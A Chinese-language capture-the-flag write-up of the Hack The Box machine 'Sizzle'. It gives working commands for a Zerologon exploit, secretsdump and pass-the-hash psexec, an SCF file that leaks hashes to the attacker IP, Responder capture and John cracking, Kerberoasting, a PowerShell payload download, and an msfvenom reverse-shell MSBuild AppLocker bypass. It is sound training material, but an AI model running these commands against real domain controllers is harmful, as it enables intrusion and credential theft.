这题zerologon直接秒了
python3 cve-2020-1472-exploit.py SIZZLE 10.10.10.103
impacket-secretsdump -no-pass -just-dc htb/SIZZLE\$@10.10.10.103
impacket-psexec administrator@10.10.10.103 -hashes aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792e0ac3a162c9267
nmap -p- -v --min-rate 10000 -sV -A 10.10.10.103
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Issuer: commonName=HTB-SIZZLE-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-07-03T17:58:55
| Not valid after: 2020-07-02T17:58:55
| MD5: 240b 1eff 5a65 ad8d c64d 855e aeb5 9e6b
|_SHA-1: 77bb 3f67 1b6b 3e09 b8f9 6503 ddc1 0bbf 0b75 0c72
|_ssl-date: 2022-07-02T11:09:47+00:00; -4s from scanner time.
443/tcp open ssl/http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=sizzle.htb.local
| Issuer: commonName=HTB-SIZZLE-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-07-03T17:58:55
| Not valid after: 2020-07-02T17:58:55
| MD5: 240b 1eff 5a65 ad8d c64d 855e aeb5 9e6b
|_SHA-1: 77bb 3f67 1b6b 3e09 b8f9 6503 ddc1 0bbf 0b75 0c72
|_ssl-date: 2022-07-02T11:09:46+00:00; -1s from scanner time.
| tls-alpn:
| h2
|_ http/1.1
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Issuer: commonName=HTB-SIZZLE-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-07-03T17:58:55
| Not valid after: 2020-07-02T17:58:55
| MD5: 240b 1eff 5a65 ad8d c64d 855e aeb5 9e6b
|_SHA-1: 77bb 3f67 1b6b 3e09 b8f9 6503 ddc1 0bbf 0b75 0c72
|_ssl-date: 2022-07-02T11:09:46+00:00; -1s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Issuer: commonName=HTB-SIZZLE-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-07-03T17:58:55
| Not valid after: 2020-07-02T17:58:55
| MD5: 240b 1eff 5a65 ad8d c64d 855e aeb5 9e6b
|_SHA-1: 77bb 3f67 1b6b 3e09 b8f9 6503 ddc1 0bbf 0b75 0c72
|_ssl-date: 2022-07-02T11:09:47+00:00; -1s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Issuer: commonName=HTB-SIZZLE-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-07-03T17:58:55
| Not valid after: 2020-07-02T17:58:55
| MD5: 240b 1eff 5a65 ad8d c64d 855e aeb5 9e6b
|_SHA-1: 77bb 3f67 1b6b 3e09 b8f9 6503 ddc1 0bbf 0b75 0c72
|_ssl-date: 2022-07-02T11:09:46+00:00; -1s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL
| Issuer: commonName=HTB-SIZZLE-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-07-02T20:26:23
| Not valid after: 2019-07-02T20:26:23
| MD5: acd1 5e32 da9d 89e2 cde5 7b46 ca12 1d5e
|_SHA-1: 06b2 0070 6600 2651 4c70 054f b1aa 9c15 cadd f233
|_ssl-date: 2022-07-02T11:09:46+00:00; -1s from scanner time.
| tls-alpn:
| h2
|_ http/1.1
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open unknown
49677/tcp open msrpc Microsoft Windows RPC
49688/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49689/tcp open msrpc Microsoft Windows RPC
49691/tcp open msrpc Microsoft Windows RPC
49694/tcp open msrpc Microsoft Windows RPC
49699/tcp open msrpc Microsoft Windows RPC
49708/tcp open msrpc Microsoft Windows RPC
49715/tcp open msrpc Microsoft Windows RPC
Service Info: Host: SIZZLE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1s, deviation: 1s, median: -1s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-07-02T11:08:51
|_ start_date: 2022-07-02T11:03:17
sizzle.htb.local
nmap -n -sV --script "ldap* and not brute" 10.10.10.103
得到域名HTB.LOCAL
可匿名登录,但里面啥也没有
测试域传送漏洞不存在
可匿名登录,但无权限查询
80 443好像是一样的站点。
certsrv目录需要账号密码
存在iis短文件名猜解漏洞
也没有多余的发现
可匿名登录
smbclient --no-pass -L //10.10.10.103
ipc$可以连接但是没权限执行操作。Department Shares可以访问
smbclient '//10.10.10.103/Department Shares' -N
users目录下得到一批用户名或许有用
amanda
amanda_adm
bill
bob
chris
henry
joe
jose
lkys37en
morgan
mrb3n
Public
kerbrute验证一下,只有amanda是域用户
./kerbrute_linux_amd64 userenum -d HTB.LOCAL --dc 10.10.10.103 /home/wuerror/Downloads/temp/sizzle/user.txt
检查发现users/public目录有可写权限,上传scf文件,命名为@wuerror.scf
[Shell]
Command=2
IconFile=\\10.10.14.12\wuerror.ico
[Taskbar]
Command=ToggleDesktop
本地responder监听
sudo responder -I
使用John破解
john --format=netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt amanda-hash.txt
得到密码Ashare1972
使用amanda身份查看smb
smbmap -H 10.10.10.103 -u amanda -p Ashare1972 -R SYSVOL\HTB.LOCAL\Policies
未发现grous.xml
尝试winrm登录,失败。smb无可写,psexec失败
登录web成功
本地openssl生成一个证书
openssl req -newkey rsa:2048 -nodes -keyout amanda.key -out amanda.csr
一路啥也没填直接回车
然后web页面选择request a certificate ---->submit an advanced certificate request.
然后把他生成的证书下载到本地(certnew.cer),使用winrm脚本登录
require 'winrm'
# Author: Alamot
conn = WinRM::Connection.new(
endpoint: 'https://10.10.10.103:5986/wsman',
transport: :ssl,
client_cert: 'certnew.cer',
client_key: 'amanda.key',
:no_ssl_peer_verification => true
)
command=""
conn.shell(:powershell) do |shell|
until command == "exit\n" do
output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
print(output.output.chomp)
command = gets
output = shell.run(command) do |stdout, stderr|
STDOUT.print stdout
STDERR.print stderr
end
end
puts "Exiting with code #{output.exitcode}"
end
获取域用户列表
net user /domain
Administrator amanda DefaultAccount
Guest krbtgt mrlky
sizzler
impacket-GetUserSPNs HTB.LOCAL/amanda:Ashare1972 -outputfile hash.kerberoast -dc-ip 10.10.10.103
发现mrlky用户是可以Kerberosting的但是超时了。上传rubeus试一下
发现下载被拦截了,执行tasklist也没权限
但是powershell下载是可以的
Invoke-RestMethod -Uri http://10.10.14.12:8000/rb.exe -OutFile c:\temp\rb.exe
.\rb.exe kerberoast /creduser:htb.local\amanda /credpassword:Ashare1972
blocked by group policy
$executioncontext.sessionstate.languagemode
发现处于受限模式
applocker绕过 shellcode.xml 生成一段shellcode填入上面的xml,然后后缀改为.csproj
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.12 LPORT=5555 -f csharp -o meterpreter_445.cs -v shellcode
msbuild触发反弹
c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe shell.csproj
但是绕过失败了。。。。。。。。
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。